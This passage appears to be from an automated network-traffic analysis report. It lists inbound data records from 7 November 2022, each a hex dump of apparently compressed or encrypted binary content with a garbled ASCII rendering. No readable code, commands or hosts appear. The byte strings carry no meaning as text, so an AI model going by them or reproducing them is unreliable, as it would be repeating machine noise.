d0 b5 15 c3 83 ee b7 da 75 87 14 05 78 7f 92 f3 a8 8c e6 df 5d 98 15 98 49 9d 7e c6 cc fc c5 fc a0 45 aa ad ae 31 cd d6 ab e1 21 ed 8e 46 66 d4 a4 bf 80 bd 92 Data Ascii: P<p+dK5=1fve e}{v_>j2W6_{5i~W<Z[8c.QO+Du21UfWq5*M!<:jSO\^H'Oxz`}~Jd;Tf)ux]I~E1!Ff
2022-11-07 22:49:10 UTC	12169	IN	Data Raw: 4e bc 66 80 94 81 87 30 fe 8d 50 00 e0 67 07 46 f2 7b fe 3f 16 98 72 c0 b2 11 e2 3f 31 b9 32 b6 df 0f a4 ef 87 99 5e 29 04 39 ea cb e7 b1 8a f8 33 ec 25 2b 20 b8 5c 69 da 0e 8c 95 27 25 48 0d 87 53 f8 25 3e 23 05 db a1 4c a3 b0 19 94 fe e0 5c dc c9 d8 e0 1c 8e 40 7d 0a 92 c6 9b 21 27 a7 b3 14 04 26 be 09 78 10 4b a0 96 fc 1f 6d db e8 9e b9 2d f9 0f b1 c9 8b 8e 7e 2d 22 28 08 ee 0c 8f 31 26 37 b2 ad e4 72 06 a2 38 76 3a e4 db 1d 67 ee 7c 27 80 f9 eb 9f 50 a9 d7 83 3e b8 b5 b2 7f 83 f8 4b df 8c bd 78 92 ac ba c2 60 34 68 50 ad 7b d7 a2 90 f6 5c 78 2b 9b 81 af 26 6d dd 62 43 d1 8e 0d 45 50 40 19 ad af 8f 6c 5d c6 31 d5 6e 7d d8 4e 77 79 08 cd 4c 6f 13 d0 2e 4f 47 16 7b a5 31 1e 8e f0 44 64 d1 0f 98 4e 32 22 09 56 79 8b a3 4e 10 b7 cb 5d af f4 eb d3 d7 3c 2e Data Ascii: Nf0PgF{?r?12^)93%+ \i'%HS%>#L\@}!'&xKm-~-"(1&7r8v:g\|'P>Kx`4hP{\x+&mbCEP@l]1n}NwyLo.OG{1DdN2"VyN]<.
2022-11-07 22:49:10 UTC	12185	IN	Data Raw: 81 a4 db 10 69 a1 72 18 40 25 25 28 a8 a6 95 9b d6 97 21 41 37 16 48 be 69 e6 47 32 c6 59 1e be 51 f6 4d 7b 17 a8 9d 48 91 a0 8f aa 90 7b fa f1 69 8e e5 45 e6 42 88 08 ec ed 49 32 f4 b0 d1 f0 53 cf 6f 97 66 72 92 ff c1 9d 80 19 7a 65 d8 19 5e 41 db 7a 31 2a ae 3f 22 71 ca d7 fd fb f2 43 36 bf af c1 5d 76 38 05 c0 f7 ed 5c 2f a7 bb b7 36 ff c0 52 03 25 f0 38 9d fa 46 b6 21 fa 36 91 b0 3c 93 a0 fa 5d 74 5b cd 70 9f 38 52 a9 22 7a 14 2f d9 15 bc 21 31 71 3e 89 ce bd 24 1f 8a d6 5d dd 1d 7c 5b 2e 48 ce 30 5f 5a c2 eb 83 fb f2 71 d2 65 6b 55 16 cd c0 42 51 d3 54 94 0e 34 52 e9 df b4 42 f2 62 2a 71 ad 9a 49 a9 30 41 c3 93 84 da 6d c4 7b 6d 9e 91 bf 44 bf 35 68 a4 28 cf 90 5a 0e f3 50 99 b5 10 47 ca f2 7d ad 5f cd 1c fc da a1 9a e1 c9 9b 34 13 3b 52 4e 89 a5 a3 Data Ascii: ir@%%(!A7HiG2YQM{H{iEBI2Sofrze^Az1?"qC6]v8\/6R%8F!6<]t[p8R"z/!1q>$]\|[.H0_ZqekUBQT4RBbqI0Am{mD5h(ZPG}_4;RN
2022-11-07 22:49:10 UTC	12201	IN	Data Raw: 6a 4b 63 e2 d2 c4 71 c1 62 62 f2 a1 59 97 c7 9f 4d 5a 14 96 d9 f4 d8 2d 07 e9 38 d0 a5 f2 02 73 1b 54 61 42 34 43 37 23 1a b5 7c 5b 05 04 af b3 65 7b 1b 58 58 4d c7 cb 2d 39 95 62 74 8b 71 fa 0b fc 25 5b d1 44 bd 7e ae 7b af 86 36 0e cf a0 ed 7a fd 71 d6 fa 5e 20 75 ff 2e 0d 6b eb e7 76 98 f3 f8 9d cc c5 c5 f1 19 9e 1a ff c0 26 d7 d9 4e 20 39 e7 f6 75 91 3b 6c 94 d3 bb 7f 92 1a 64 04 27 34 cf 2e e6 66 f1 a9 d3 ba c5 c7 4c 20 f1 9d f0 04 5f fa 27 ac de d3 f8 0b 82 0d 25 01 66 8d df bb 5e 53 83 e9 a8 12 5f ed b1 8a 8b 24 ea 28 55 12 d8 d6 bf a8 95 19 90 cf 1e 3b 76 07 29 86 29 cb f5 13 6d d9 a6 5c 76 6e fc 3f 37 97 c5 b4 8d 37 2f 7a 6a 26 96 9e fc b2 9a c2 8c 83 cc 60 f0 31 a0 3b a1 d8 e4 f3 57 0e 5b a1 21 b2 6d f1 b4 0d 55 3d 58 c0 c7 93 2d 84 d7 93 8e 72 Data Ascii: jKcqbbYMZ-8sTaB4C7#\|[e{XXM-9btq%[D~{6zq^ u.kv&N 9u;ld'4.fL _'%f^S_$(U;v))m\vn?77/zj&`1;W[!mU=X-r
2022-11-07 22:49:10 UTC	12217	IN	Data Raw: b7 b0 97 49 1f de 2d f0 32 b8 ee a4 c3 ca bb 89 b9 c2 76 54 58 52 93 1e 25 a7 d6 8b ad 1c f0 0c 21 e1 47 06 b5 d5 50 60 c2 14 cb 23 02 5a f3 4c 94 9c 3e e3 50 01 6a d5 00 22 72 eb 47 fe ae 7b 2e ff ee de fc 3d e5 d1 07 b4 38 2b 49 9f dc a1 f5 45 c5 c9 00 af ac 35 8a 2b 95 bf e4 3d 18 d1 90 b8 05 e0 f3 93 86 b9 0d a2 66 6e 1f 19 43 96 f8 c5 9c c6 60 0b d8 e1 00 cc e9 83 d0 7a cf b7 b7 ed 14 da e9 01 2a 83 16 46 0b 0e 27 b5 e4 72 ce cc 49 8b 43 b8 ff 2a a4 42 bf 48 87 9f ac 33 f0 a1 e8 c3 56 39 01 50 c7 0b 59 7c 33 11 49 95 f1 9f 58 e4 b2 9f 58 b5 47 fb f0 b7 12 a5 a9 b4 1b 85 f5 c7 73 7e ab a9 54 d6 8d 89 04 98 a1 5e 7b 68 71 cd b7 2c 4e 71 0e 94 5f bf 40 05 01 ec f8 2a 96 ea eb 8e f0 2b 25 37 97 33 a3 b2 ad 15 d6 56 0d 93 f7 7b ba f5 5e ba 6a 43 4d 60 7a Data Ascii: I-2vTXR%!GP`#ZL>Pj"rG{.=8+IE5+=fnC`zF'rICBH3V9PY\|3IXXGs~T^{hq,Nq_@*+%73V{^jCM`z
2022-11-07 22:49:10 UTC	12233	IN	Data Raw: bf ae 92 33 3c ba 08 36 18 da 44 38 71 8b 7d 46 48 40 7a a1 c8 90 25 d6 65 0e 1a d4 d0 f6 46 bd b7 ac 89 56 58 11 f4 53 fa 2c 71 f4 80 ca 6a b2 c7 ca 42 90 01 99 22 af 6c 17 71 ec 5b 1a b5 18 1a c6 32 9e 46 78 42 5f 37 bb e8 5a 85 83 ab d4 1a aa 73 9b 3d 39 20 44 bc 9e 62 a8 49 cb 41 82 09 c5 45 b0 d7 ec 16 4f cd 52 26 f3 80 cb 5b 15 b1 d3 43 9a a7 e0 b4 26 31 b9 e5 17 26 d4 09 cb 7d 5a dd c7 a2 f7 17 d6 64 4d 0a 98 c4 e8 f1 bc c2 29 74 16 0c 9e c3 fa 03 da ad bb 28 76 79 f2 fc 52 95 c0 03 0f 5f ca 55 3b da 0a 16 a2 a2 91 29 bd a8 d6 a4 5f 61 5e 38 3d 67 d1 d1 ab f6 96 09 c8 f0 30 b1 b7 a7 b1 84 a6 ee dd 0c 58 d2 31 ae 25 ab 56 f8 a5 f2 41 fb d1 d2 85 42 54 2b 63 fe 1c 63 7e 17 a9 9f 64 01 a9 9f df e2 76 0a 94 0c 7f 0a 47 1f fe 84 6e fe f9 50 7d 50 10 99 Data Ascii: 3<6D8q}FH@z%eFVXS,qjB"lq[2FxB_7Zs=9 DbIAEOR&[C&1&}ZdM)t(vyR_U;)_a^8=g0X1%VABT+cc~dvGnP}P
2022-11-07 22:49:10 UTC	12249	IN	Data Raw: 4f 9e 8f 8c 16 bc da 9b d4 3f c3 24 50 22 b6 5a fb eb c7 f2 68 7c 1b 8f a7 f3 21 44 de d9 ff 65 0d 6c 9a ba b2 7c 9b 80 17 43 24 62 5e f8 1f 7c d3 bf 08 8b cb 9a 2b 9c 8a 20 dd db 77 e6 03 8b ae 33 90 ce 44 42 54 b4 ee ad 7a 08 c1 b9 df d4 f2 97 11 c7 12 ef 5f 13 04 04 5c 6e e0 6c b7 25 95 62 3c 7c d3 aa 64 e2 2e 91 a0 21 2b 56 ee 2d c9 34 f7 d1 3a 12 fb 78 6b 21 fa 2a de b7 65 d0 58 61 b6 8d d2 1f b9 f8 85 4e 36 4b c3 d9 ab d8 da 22 3a b2 88 01 65 a2 e1 72 33 6c 7b 1a cb e4 8e 00 36 a0 1b 0c 3a 35 d3 07 12 bc 8e 93 36 d0 60 cd 1e 79 32 30 3f 67 37 31 64 72 03 44 8e 22 df 54 95 e6 5d 2e 86 ab 60 87 c0 a8 76 57 45 9b ea 3b 6d 51 dd 3e ad 47 39 10 c0 04 26 95 0d 3d 31 97 0e 4d 96 e4 a9 b9 1f ef 57 03 7d eb 81 95 ab b2 4c bd 5d c3 a4 ec 0e 4d 29 9d 71 c5 44 Data Ascii: O?$P"Zh\|!Del\|C$b^\|+ w3DBTz_\nl%b<\|d.!+V-4:xk!*eXaN6K":er3l{6:56`y20?g71drD"T].`vWE;mQ>G9&=1MW}L]M)qD
2022-11-07 22:49:10 UTC	12265	IN	Data Raw: 27 9f 2a 95 c6 31 b3 bc 7f bb f1 60 ec ea e6 db f8 82 7e 4f 58 9a 44 23 52 00 d5 7e 38 de 84 93 eb d4 7d ec 6a aa a4 1e 9b 52 a8 4c 8a e5 75 6c 75 66 90 67 6d aa ac cc 30 38 52 08 a9 79 97 ff ff 61 40 1a 0f 8b 78 d9 4c 79 cf eb 98 28 82 05 0a 67 f5 66 45 01 3f b8 1d 59 a6 fd 13 18 9c d9 ea 22 8e f1 44 c9 ee e9 bf 79 c7 0c 9c 10 84 a4 bb 94 aa 1e 1f f2 c6 3d 11 89 81 95 d2 94 ae 4d 57 9c b9 02 19 ba 14 23 71 14 ce 85 44 0b a8 fe 79 d7 29 ea 67 89 37 89 93 2d 01 89 42 a5 4a b0 ca a2 d5 a3 51 c2 f2 0c b0 1e b1 73 a6 13 b3 e1 69 91 93 00 9f ab 84 45 a7 97 f7 3c 25 5d d3 48 2d 60 0e 35 c0 ec 4c b3 f4 93 0e 3d fc 9d 46 a3 ce de aa 7a 18 13 a0 79 e7 d9 32 fa 6e e7 e6 76 a3 d9 3b ad 4a 9e 3b 55 f8 3f 23 88 2f 1d 75 2b bb 6e be 50 64 89 c5 17 c2 4b 7c ea da 6b c2 Data Ascii: '*1`~OXD#R~8}jRLulufgm08Rya@xLy(gfE?Y"Dy=MW#qDy)g7-BJQsiE<%]H-`5L=Fzy2nv;J;U?#/u+nPdK\|k
2022-11-07 22:49:10 UTC	12281	IN	Data Raw: bd 94 16 4f c4 80 b8 bd c1 94 68 cb 73 50 61 3b 82 50 69 70 ae f6 06 3f c8 37 22 bc 1b a6 b6 f3 67 37 ad 8f 73 17 14 e6 6e 11 56 0b 49 f5 ba 08 a6 e9 c2 12 07 79 38 15 fd ed fa 00 04 47 98 0b bc 4b 9c 0d 92 78 d1 e5 40 3b fa 98 d0 e3 ff 7a ef e1 d1 9f 44 33 48 20 90 d9 70 2b f5 f0 93 55 b6 18 09 cd 7e 34 d5 35 76 f2 72 42 a1 c1 68 05 9f 1f 84 76 0b 65 c3 75 aa d5 3e 83 af 5b 65 dd da d9 33 d6 7f 41 92 89 16 85 e6 42 48 3e 8e 0a d2 41 70 98 73 22 05 a6 34 8e 42 e5 fc 62 f7 51 e3 16 61 f4 cb 70 60 69 c8 ed 81 72 c9 23 c9 8d 80 d6 25 7e 25 e1 fb 20 d8 79 93 b6 9f e5 1c af fb d4 95 f4 9a cf 5f 16 9f ac 5f 38 0d ba fb 36 8d 1d e9 60 ab 36 53 81 7a f6 be 3f e7 63 4b 2f ec f3 c9 a4 24 97 4f a2 40 3f 1b bf 52 40 d5 69 08 1b 63 39 b1 ca 61 15 af 48 a1 25 85 34 5e Data Ascii: OhsPa;Pip?7"g7snVIy8GKx@;zD3H p+U~45vrBhveu>[e3ABH>Aps"4BbQap`ir#%~% y__86`6Sz?cK/$O@?R@ic9aH%4^
2022-11-07 22:49:10 UTC	12297	IN	Data Raw: a0 be e8 eb e5 80 56 52 6d 95 05 ec 6e b0 69 02 04 46 6c f5 8a 7e 73 1a 0a 57 ca f6 1e f9 da a7 20 06 c5 f1 92 38 dc e1 59 a7 12 f2 fb a5 cc 1f 26 7c 7b 6c ca 1f 67 1b ef 8e f0 16 55 02 eb 0e cf bf 4a b1 7b 14 2b 63 31 d4 28 e7 1e be 5a 1d d8 50 f1 75 39 82 43 1d 6b f3 0f bd f7 37 2d d0 bf 1c 59 ee 6a 3e 1b 1e af 32 3e ce 06 66 c1 a6 95 24 d5 00 73 9f 08 d9 72 37 de f8 9d 4c 00 f7 a9 bd 37 ec f8 3a a0 ec 7c 10 27 3f 42 51 c8 8b 98 a1 a2 f8 a5 88 16 28 82 61 6d 8f f0 17 71 ba 77 2a 1e 70 70 69 b9 d9 11 52 8c b3 ae f2 a4 0c 13 e2 ce 08 fa a6 c5 11 7e 08 3c 89 27 cc 99 c0 5a 94 46 a8 8e 6e 71 09 f7 35 e4 eb c2 25 43 d0 c9 dd c5 8a 4b 99 77 d3 0f 92 61 3e 96 cb 95 53 2c d2 70 96 30 70 2c 2f 68 04 b3 6b 08 e6 bc 2d a6 92 88 24 8e 56 eb b0 e2 bb ee 22 0d 48 a7 Data Ascii: VRmniFl~sW 8Y&\|{lgUJ{+c1(ZPu9Ck7-Yj>2>f$sr7L7:\|'?BQ(amqw*ppiR~<'ZFnq5%CKwa>S,p0p,/hk-$V"H
2022-11-07 22:49:10 UTC	12313	IN	Data Raw: 42 4d b6 ee 40 36 d8 3f 1d ec 84 f7 c4 e5 24 45 66 d1 0d 3b db e3 27 5d a5 d6 c7 cb 3f bf fa 99 a6 0c ff a2 87 91 39 ac 7e fe a1 84 bd 7b 9f 39 e5 71 55 ff ea 38 16 09 39 65 e6 8d d3 d2 b3 34 4b 2e 0d d3 30 65 a0 5b 55 80 ab a3 be 78 e8 2c c3 6d 34 97 a6 99 cc 54 9a fe 9d 79 ac b2 41 ed a3 70 8e 30 ce b2 12 5e 1b 65 94 73 d2 98 0d 25 17 14 a4 ea 86 d4 b5 9b 11 1f 3f 63 e5 bc fa d8 33 bb 5f 5d 2e 6b 42 88 26 9d a8 59 5a 21 3d 7e c2 bf 56 ee 69 3b a2 a7 bf a9 ba 2b fe 57 93 43 3f e4 e7 6d aa fb 44 c8 9a b4 84 a1 54 8e 9c f1 99 44 58 88 5a 05 93 d2 ae 7e 52 16 ab 96 42 97 0f db 13 06 8c 38 bc 24 81 df 21 6a 18 f6 25 4b 92 35 99 73 86 d8 da 16 2d 04 38 92 26 ce 08 1a 35 1f c4 77 db dc bf b6 f4 c8 ca ef 7d eb c2 17 90 53 6d 08 4c 7a 52 7c 32 3c b6 cc c7 c4 72 Data Ascii: BM@6?$Ef;']?9~{9qU89e4K.0e[Ux,m4TyAp0^es%?c3_].kB&YZ!=~Vi;+WC?mDTDXZ~RB8$!j%K5s-8&5w}SmLzR\|2<r
2022-11-07 22:49:10 UTC	12329	IN	Data Raw: d7 02 3d 43 9b d2 19 8f fb 5c c4 7e 1a 82 70 77 20 dd 2e 4b c8 fb 08 1b 43 91 c2 2c 3e f2 58 bc a3 bc 09 d5 85 e9 13 c1 ef bb a3 16 cf 3e 35 56 2a 1f 4d d5 4e 59 99 ed 1c e6 00 3f b5 4c 4e c0 b9 26 12 b8 06 6f 59 f2 6a d8 43 18 96 ed b0 f8 31 b2 99 dd ba a9 dd 90 bf 63 b8 64 66 0c 61 10 b0 be ee 34 6d 28 22 c3 f4 88 5c 20 5e 90 99 c7 e2 2f 91 01 1d d0 3c a6 b2 28 04 7e f0 ad 1c 08 49 d5 d2 fe 78 6f 6d fb 7e 4d 7c 53 bf b7 b2 e1 84 52 a8 49 5c 3d c2 06 47 ad da 78 13 a5 4b db 2e f7 76 eb e4 64 41 10 b7 96 06 43 94 4d 54 49 b3 7e 05 34 ad 84 cf 20 cf 88 83 2a 29 40 28 14 d0 0d 39 d2 d4 11 1c 10 59 0f 40 42 c3 57 c1 c1 46 67 63 be f0 7b 51 c5 ec 2c c0 fb e4 4e 9b aa b6 ce 1f 46 64 5d 9e 58 8a c9 ee 5b 28 5d 53 f1 08 d6 a8 79 47 24 c5 ea eb eb 3c 71 97 81 e4 Data Ascii: =C\~pw .KC,>X>5VMNY?LN&oYjC1cdfa4m("\ ^/<(~Ixom~M\|SRI\=GxK.vdACMTI~4 )@(9Y@BWFgc{Q,NFd]X[(]SyG$<q
2022-11-07 22:49:10 UTC	12345	IN	Data Raw: 0e 24 12 53 7e 2c a9 44 e7 84 f9 da 23 bf ec 24 1a 08 a3 04 86 8b fe 22 f3 29 46 e3 cf 5e b7 af 55 21 24 e2 24 2e 7e 71 98 24 1e ff e9 e4 ac 17 b5 1f a5 33 c2 d5 ca 9b c2 6f 05 50 5d 9c be 0e 6b 53 18 fd ae e8 7a 00 8d af 11 ec 11 03 4a f5 09 38 de 4e 7d 68 ae fe 49 34 6d 02 a3 e3 43 60 0a 37 9f 9f 94 39 6c ae 46 7d 9f ab de b5 49 e1 a0 bc 40 da 9a 0a c7 f8 b3 8a cc 27 25 65 b2 b7 1d 12 1f a2 7d da 9c c3 22 27 17 21 28 52 46 fc 9b e3 e4 14 7c f8 c8 41 fb 3e a2 7a 22 5b 0a 61 7d 3c e2 89 f4 20 75 93 ac 3b 9c ed 5e 33 c8 b1 a9 52 30 d8 e6 c8 e5 68 17 48 b9 b9 21 c5 6e f5 c5 69 76 66 3c 74 67 20 2e 6f d7 1c 01 f3 4f b2 b3 c4 8f 5d af a6 e2 ac f1 7f 49 8d a6 7f 27 e7 9c 47 7b 5d 6b 6f 0e dd b2 5d ce 0d 8b 01 b2 e5 9f 74 a0 57 c5 cd d4 4d 49 97 29 b6 0d a1 e3 Data Ascii: $S~,D#$")F^U!$$.~q$3oP]kSzJ8N}hI4mC`79lF}I@'%e}"'!(RF\|A>z"[a}< u;^3R0hH!nivf<tg .oO]I'G{]ko]tWMI)
2022-11-07 22:49:10 UTC	12361	IN	Data Raw: f5 53 1f 79 79 cd af 0e 7d 9d 69 90 a5 71 2b 20 3c dd 43 5d 2e 7e ef cb 8d 72 31 22 a0 e8 2a ae 78 64 ef c2 2c cd 7d 47 93 04 05 7d 88 db bd 6e d5 0e 9c b1 6f 21 e3 97 f2 26 57 2c bb d9 6d 03 16 da c7 6e 26 cc 22 f3 5d 0a 17 ce 2b d7 d4 71 41 f9 ba 5f 4f 03 c5 30 4b 6d f7 d6 9e cc e7 1b 2a 9e b2 a6 f3 fa bc 1f 96 92 6f b3 ce 29 74 e7 40 49 42 03 22 2e 34 dd 9a 9c aa 5b 26 46 5c eb a5 46 a4 68 5b d8 58 76 78 6a 81 43 ab bd 86 bd 53 1d 71 29 a2 9a 93 2d 5f c1 7b 9a 1e 5a 73 76 57 42 df c4 86 51 20 6b 6b e8 4e 26 ac d5 35 5b ab 9d 87 50 bb 0c b8 c8 07 04 2f 80 23 71 e9 1a 9d cf f7 92 53 4c b9 89 63 65 7a 82 b9 b0 00 7f a3 ff c0 56 16 b7 85 5f 4b 3e 5c bb 7c 34 ba 40 0e 3c 0e cc 81 e4 12 7b 30 da 65 0f 94 cb ce 23 0a 32 23 6c b5 c7 f4 5b 05 c2 cc af 6b 21 9b Data Ascii: Syy}iq+ <C].~r1"xd,}G}no!&W,mn&"]+qA_O0Kmo)t@IB".4[&F\Fh[XvxjCSq)-_{ZsvWBQ kkN&5[P/#qSLcezV_K>\\|4@<{0e#2#l[k!
2022-11-07 22:49:10 UTC	12377	IN	Data Raw: 62 5d 15 9f cc 9f 02 42 c8 58 a7 ab a4 61 b1 9f 95 8b 3d 16 ae 5a a1 12 b6 08 99 80 fb 3c ff 0f 84 5d 9a d4 cd cf 7a 2d ba 8f e6 7a 9d 26 96 59 b7 32 9d 34 35 d4 57 aa 27 39 2a 71 bf 5e 17 07 97 d0 de 87 af f8 d6 81 fb 4b 4c 19 cd b0 de 7c 4e 25 82 e1 1d 84 74 2f 82 5b cb 1d 4c 69 d1 18 ea 70 ab 3a 0e d7 11 72 22 84 d9 cf fb 19 08 3a 13 85 d7 94 61 0e 7d b0 a3 7a cb 87 03 39 64 4a 9d f3 1b 92 24 2d 17 92 d1 ae 39 ed 75 f0 9a d0 d5 d8 52 91 c3 c4 62 47 54 bd 1c a4 8b ad 62 d8 5a b3 bd 15 5e 97 72 4d 41 f3 a4 00 26 e1 4c 89 62 36 92 b9 29 e0 3b 68 cc e0 69 a4 4e e4 e5 2e 6c 29 66 5a 78 56 d3 27 e5 f4 8f f6 0b 15 58 86 59 2a dd 2b 65 fb 92 54 b6 bc 63 2e a3 cf 44 ca df 90 06 97 86 cb c1 61 c1 57 eb 83 7d f1 d0 fb 17 97 99 78 e6 96 e8 e8 e4 f1 79 07 62 38 84 Data Ascii: b]BXa=Z<]z-z&Y245W'9q^KL\|N%t/[Lip:r":a}z9dJ$-9uRbGTbZ^rMA&Lb6);hiN.l)fZxV'XY+eTc.DaW}xyb8
2022-11-07 22:49:10 UTC	12393	IN	Data Raw: 36 8a 48 c9 bc cb ee dd 56 4c 2d 73 1f 18 8c 85 3e f7 a1 96 85 ca 61 91 31 6c a6 44 fb 5c fa 2f f7 c1 43 2f a1 60 9c e1 1a 2e 1a 4e f9 bc cb ab 1c ed 5f a4 1d 2c 96 2f 05 d6 5d 2d fe 4b 13 f9 25 66 62 0c d5 52 88 ca 4f 55 24 8f 3b 85 1c de 38 9f 17 0c 93 3f a1 80 2d 09 38 72 53 04 16 84 d4 d8 cc a4 77 2f b7 15 d0 d4 4b 4d 25 84 79 a5 7e 8d fd 2c c9 58 62 c3 47 d3 c2 11 f7 5f 47 26 08 c2 66 c1 3a 1d 7c 37 47 43 1a 29 73 82 1d 17 41 de 4e b1 1d 30 83 95 d6 14 af 13 2f 82 53 4f 29 1b 15 02 53 7c 52 b6 f9 27 4f de dc ad c9 ba 57 83 6e 27 53 0c a6 66 d3 52 79 75 32 9d a3 90 9e eb 95 cd 0e 7a 41 65 9d 14 bc fe 55 71 3d 68 dc d9 50 e4 bc ee 21 de 77 d5 be c2 bc c6 70 f8 67 04 dd e3 5f ab e7 29 fa 48 6a ae 5b b6 e4 eb a0 11 b2 c1 74 6e b6 02 c1 bb b5 0e 1e cd 07 Data Ascii: 6HVL-s>a1lD\/C/`.N_,/]-K%fbROU$;8?-8rSw/KM%y~,XbG_G&f:\|7GC)sAN0/SO)S\|R'OWn'SfRyu2zAeUq=hP!wpg_)Hj[tn
2022-11-07 22:49:10 UTC	12409	IN	Data Raw: 7f 2f 4d 5e ee 22 bf 33 ca 01 02 de 8a 3f f1 53 44 1f 96 f0 66 3b d0 b2 d8 65 24 49 84 10 56 2c c5 df a8 90 13 83 64 ee be 47 27 ea 39 3c 97 46 80 f6 22 d9 2a 1f 9e 71 c0 12 e4 5b 36 ee b2 0a d3 e6 fe 46 2a 08 c7 ff 34 ae de 7c a3 99 fd ac cc 84 9f 83 84 42 e7 43 3f c7 89 00 97 b9 00 69 de 53 83 2f 89 21 fb 60 8a 9d 1a 91 9d 41 45 64 19 26 8d 7e 0f 46 8d 5b f3 08 42 59 a7 2e 41 43 ec 25 22 80 4a c5 28 60 23 19 83 3c 1e 79 e6 7c 59 68 8d 1f d8 d9 1d f6 f3 a5 cd cc 6a db 60 3b 94 09 b4 ed de 43 38 7c 3f 0a f3 1c e2 db 93 88 5b d9 eb ab d2 84 6b f8 e3 48 94 c1 32 a9 89 89 4e 21 97 e0 b5 d7 f1 6f 3a 3f 09 4c 19 2a 95 68 64 5e 5b aa d2 98 d4 58 b0 ab 0b b9 bd ad ff cf 6c 59 84 4d 70 f6 a7 03 88 07 a4 fb bc ee 49 3a d8 5e 50 cd 04 11 51 c6 4c be 16 44 94 f0 03 Data Ascii: /M^"3?SDf;e$IV,dG'9<F"q[6F4\|BC?iS/!`AEd&~F[BY.AC%"J(`#<y\|Yhj`;C8\|?[kH2N!o:?L*hd^[XlYMpI:^PQLD
2022-11-07 22:49:10 UTC	12425	IN	Data Raw: 74 20 5a a5 97 63 10 97 c8 04 84 60 de 68 1d 23 e1 9b 18 2b 82 70 5c 4f 30 1b 73 57 e7 f4 84 71 ac 20 12 df fd 72 6d c2 85 fe 9e 20 c3 95 7e b7 17 e0 af 44 d8 30 3f 2f 00 20 14 f0 19 b3 f3 14 0b ad 82 12 11 88 e1 42 0d 3d c2 17 01 08 21 b6 2e 3b 78 12 d4 17 55 cc 0f 68 b5 94 88 06 e3 59 7e cc e3 4f 6c be c6 1e 30 6f b6 1f 3e 47 96 46 fa b4 83 a8 ed a0 54 10 53 8d 26 cb 84 14 2c 83 a9 ce 7d e6 19 ce b0 66 d3 c5 4b 8f c3 a3 b0 70 b3 76 89 c4 61 12 73 fd de 45 a3 e7 f6 77 3d 33 60 6a 62 66 e5 7d 11 ae e4 f0 67 1a 0d a4 1d 63 bb ce c0 25 5d 2f b2 44 f5 8f e2 c3 73 0f 9c d7 2f 4f c4 7b 3f 55 1a c1 dd 1f ff 14 d1 09 a4 52 dd fd 1c c7 f6 a5 55 e3 0d 54 9c d4 e8 88 0f 06 94 c0 0a e9 ae 14 3e a9 97 df 6a e7 b2 d6 4e ef 6e f5 a3 4b 7a 7f 90 2d 33 c2 3a ce f9 63 2b Data Ascii: t Zc`h#+p\O0sWq rm ~D0?/ B=!.;xUhY~Ol0o>GFTS&,}fKpvasEw=3`jbf}gc%]/Ds/O{?URUT>jNnKz-3:c+
2022-11-07 22:49:10 UTC	12441	IN	Data Raw: b1 5c 39 9a bd 2a e8 ef db bb a8 e9 04 31 87 bd 59 30 1b b8 f2 30 e5 4a 0a 57 82 c0 f7 6d 60 bc 55 74 c8 71 20 a1 30 38 33 e4 f5 80 ca 5c 2c 78 7c 16 0e a7 0e e9 5b 76 68 45 45 2c c9 02 7b 7c 46 02 00 6e 2f 96 e3 9b 98 00 60 d7 51 a8 8e 3f 16 00 3c c9 83 16 6c 1b 05 87 fb ac 5d cf 15 78 83 e2 04 de e0 e0 7b 69 26 00 35 1e db 01 cd 89 01 22 3f 57 e5 bf b2 f9 0b f9 9a ca ea b7 a5 02 38 b8 9f e4 13 24 41 00 19 0f 0d cf c6 4d c3 08 d0 ff 86 02 e6 aa 46 09 3b 7f fe 6f 2f 43 85 2a cf 7e 45 81 29 03 69 91 d7 45 71 89 9e 21 89 35 81 4f 4f c4 20 d1 46 11 c0 c5 7f 6f b0 5f fd f6 22 20 88 15 92 48 01 09 26 0f 5a 09 96 9c 86 c3 89 88 f0 4a 6d 33 2e 54 c7 49 63 35 02 68 c3 ce 57 fe e3 c8 d4 91 81 de d1 d8 94 df 60 7a cf 47 52 b9 af 55 44 b9 d0 43 f4 06 f8 c3 2e 2e df Data Ascii: \91Y00JWm`Utq 083\,x\|[vhEE,{\|Fn/`Q?<l]x{i&5"?W8$AMF;o/C~E)iEq!5OO Fo_" H&ZJm3.TIc5hW`zGRUDC..
2022-11-07 22:49:10 UTC	12457	IN	Data Raw: 66 07 9f c8 26 65 dd 4f 4a 25 54 d2 dc 6c 2f a2 77 84 52 11 1d 7c e1 fb 99 44 5e b3 4b 35 8e 51 8a 7f 73 e0 8d f0 e2 bd 31 3f 13 78 29 c0 dc 21 b2 7c 07 41 43 20 8b f3 42 32 4c 09 f9 79 22 2b b3 dd f5 21 9b aa 04 6d 1a be 5a f6 6c 3b b9 49 b2 2a 34 a5 72 fc cf a4 3d 5e 67 c8 fd 3e 45 b6 1e 32 12 aa e5 ad 7a 03 99 0a 42 ad 95 c0 9b c8 b3 b7 98 2c 1f fc 20 8f 76 78 01 25 dc 7a 30 c5 0e 1d f1 f9 4f 2e 56 07 0e 71 6d 43 b7 0a 69 2a 7b ee 34 36 51 b9 02 77 8f 71 51 25 0f 43 14 43 8b 4b f9 8f 8c 36 48 dd 8c 99 d7 a0 bf cf 8d 2b ff 6a 9a ae e7 56 d2 1b 89 e6 b6 da e5 53 f5 0c 76 c4 62 66 e3 2f 12 6d 6e 6a 0f 4e 0c 44 73 3a 96 55 df a4 29 8f 67 5e 57 c3 3e 0b fe df 24 00 36 f3 7a e8 ae e2 dc 93 81 02 e3 3e 99 1f e9 e2 b0 19 d3 29 22 2a ba f2 4f 96 ac 35 ad 33 b7 Data Ascii: f&eOJ%Tl/wR\|D^K5Qs1?x)!\|AC B2Ly"+!mZl;I4r=^g>E2zB, vx%z0O.VqmCi{46QwqQ%CCK6H+jVSvbf/mnjNDs:U)g^W>$6z>)"*O53
